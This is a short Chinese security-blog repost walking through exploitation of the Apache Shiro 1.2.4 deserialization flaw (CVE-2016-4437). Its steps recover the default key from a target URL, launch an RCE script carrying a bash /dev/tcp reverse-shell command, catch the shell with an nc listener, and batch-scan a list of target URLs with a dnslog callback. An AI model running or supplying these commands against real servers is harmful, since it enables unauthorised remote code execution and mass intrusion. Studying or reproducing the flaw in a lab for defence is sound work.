本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2016-4437 Shiro1.2.4反序列化漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
ApacheShiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
ApacheShiro1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
![图片[1]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-安全小天地](https://img.godyu.com/2023/12/20231226124713877.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
漏洞版本:
- Apache Shiro <= 1.2.4
1.执行ShiroKeyCheck_windows-amd64.exe发现存在漏洞并爆出密钥
ShiroKeyCheck_windows-amd64.exe -u http:<em>//192.168.99.111:8080/login</em>![图片[2]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204714613.png?imageView2/0/format/webp/q/75)
2. 使用shiro-1.2.4_rce.py反弹shell(代码34行可以根据实际的key自己加)
python3 shiro-1.2.4_rce.py http://x.x.x.x:8080/login
System (linux or windows): linux
bash -i >& /dev/tcp/x.x.x.x/7777 0>&1![图片[3]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204715302.png?imageView2/0/format/webp/q/75)
3. nc监听得到一个shell
nc.exe -lvvp 77774. 也可以使用shiroFscan批量扫描url
(1.默认有100多个key,可在23行自行添加
2.需要修改第124行的dnslog地址
3.url.txt中写入目标地址列表,格式 http://xxxx 或者 https://xxxxx:000 4.python3运行脚本 观察dnslog服务器即可)
python3 shiroFscan.py![图片[4]-CVE-2016-4437 Shiro1.2.4反序列化漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204717900.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容